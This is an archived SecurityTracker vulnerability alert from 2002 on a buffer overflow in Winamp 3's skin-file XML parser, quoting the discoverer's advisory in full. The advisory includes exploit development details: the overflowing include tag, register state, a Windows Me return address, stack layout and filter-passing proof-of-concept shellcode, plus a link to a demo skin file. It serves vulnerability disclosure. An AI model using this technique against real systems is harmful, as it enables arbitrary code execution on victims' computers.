Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Winamp Media Player Buffer Overflow in Parsing Skin Files Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1005323 |
|
SecurityTracker URL: http://securitytracker.com/id/1005323
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 30 2002
|
Impact:
Execution of arbitrary code via network, User access via network
|
|
Version(s): 3 (1.0.0.488)
|
Description:
A buffer overflow vulnerability was reported in the Winamp media player. A remote user can create a malicious skin file that will, when loaded, execute arbitrary code on the target user's computer.
Illegal Instruction Labs warned that a remote user can create a specially crafted skin file that will trigger a buffer overflow in wsabi.dll. If the <include file="PATH"/> tag contains a "huge" PATH value, the overflow may occur. Although the DLL filters most non-printable characters, but it is still possible to create shell code that will execute, according to the report.
A demonstration exploit for Windows 98 is available at:
http://kamikaza.ffk.hr/advisory/default.wal
The target user's Internet Explorer browser will reportedly open *.WAL skin files automatically.
|
Impact:
A remote user can send a malicious skin file to a target user that will cause arbitrary code to be executed on the target user's system. The code would execute with the privileges of the target user.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.winamp.com/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: 29 Sep 2002 18:00:28 -0000
Subject: IIL Advisory: Winamp 3 (1.0.0.488) XML parser buffer overflow
|
[ Illegal Instruction Labs Advisory ]
[------------------------------------------------------------------------]
Advisory name: Winamp 3 (1.0.0.488) XML parser buffer overflow
vulnerability
Application: Winamp 3 1.0.0.488
Homepage: www.winamp.com
Impact: There is a buffer overflow inside XML parser DLL that
can cause execution of arbitrary code.
Platform: All x86 win32, not tested on x86 Linux
Date: 29.9.2002
Tested on: Windows Me (4.90)
Discovered by: Sunnis
Mail me @: annihilator@inet.hr
======[ Overview
Winamp is (as we all know), the most popular MP3 player for Windows.
Winamp 3 is a revolutionary succesor of Winamp 2.xx having many new
features, such as a new skinning system.
======[ Problem
Winamp 3 skin files are *.WAL and are automatically opened by MSIE. They
are actually ZIP files with altered extension. They contain pictures and
configuration files used by wsabi (Winamp skinning system).
Wsabi engine is implemented inside wasabi.dll and is designed to provide
very configurable, OS-independant system for building skinnable
applications, quickly and easily (that's the reason why wsabi.dll is 800K
big).
A buffer overflow inside wsabi.dll may occur if <include file="PATH"/>
tag is altered with extremely huge value for file PATH (btw, MAX_PATH on
win32 is defined to be only 512B). This can allow the execution of
arbitrary code inside the address space of Winamp. Wsabi filters most non-
printable characters but specially designed shellcode will still pass
through.
======[ Exploit
By writing an extremely long string of 'A' chars and setting the kerenl-
mode debugger to capture page faults, one can see that at the point of
execution, both EAX and EBX contain pointers to [OverwrittenEIP-4]. ESP is
unusable since it points to some strange value.
Winamp3 exe (studio.exe) loads many system DLLs wich contain some usable
instructions:
jmp eax
jmp ebx
call eax
call ebx
On Windows Me there is such on 0x736D2120 (we can't use some of the
Winamp's modules since their ASCII imagebase representation is NOT
considered to be valid (between 0x20 and 0x7F) by Wsabi and will trigger
an error message).
Stack would look like this:
['AAAAAAAAAAAA'... XXXX[OverwrittenEIP][shellcode]
^^^^-address contained inside EAX and EBX
Sample proof of concept shellcode would look like this:
; ASCII opcode representation:
jmp __skip ; ë+
db 0, 0
dd 736D2120h <- call eax
db 25h dup ('A') ; needed because of JMP
__skip: mov eax, 39406567h ; ¸ge@
sub eax, 794c2421h ; -!$Ly
push eax ; P
pop ecx ; Y
; eax = bff44146 = USER32!MessageBoxA on winMe
push 'aaaa' ; haaaa
pop eax ; X
xor eax, 'aaaa' ; 5aaa
; eax = 0
push eax ; P = NULL-terminator
push "tiol" ; hloit
push "pxe " ; h exp
push "tpec" ; hcept
push "noc-" ; h-con
push "fo-f" ; hf-of
push "oorp" ; hproo
push " 3pm" ; hmp3
push "aniW" ; hWina
push esp ; T
pop edx ; Z
; edx = ptr to string
push eax ; P
push eax ; P
push edx ; R
push eax ; P
push ebx ; S = return address
push eax ; Q = user32!MessageBoxA (v. 4.90.3000)
retn ; Ă
Filtering chars doesn't provide any protection at all. Writing
alphanumeric shellcode using specialized kits such as irx's ASC is even
easier.
You can try this one here: kamikaza.ffk.hr/advisory/default.wal
It works on WinMe (4.90) only, but adaptation on other win32s is trivial.
======[ Greetz
Greets go to all members of IIL (http://www.ii-labs.tk): BoyScout,
DownBload, Fr1c, h4z4rd, StYx and (in no specific order): Elrond,
harlequin, St0rm, Megaquad, Dark-igor, bila, phreax, Defiant and everyone
else i forgot.
|
|
Go to the Top of This SecurityTracker Archive Page
|
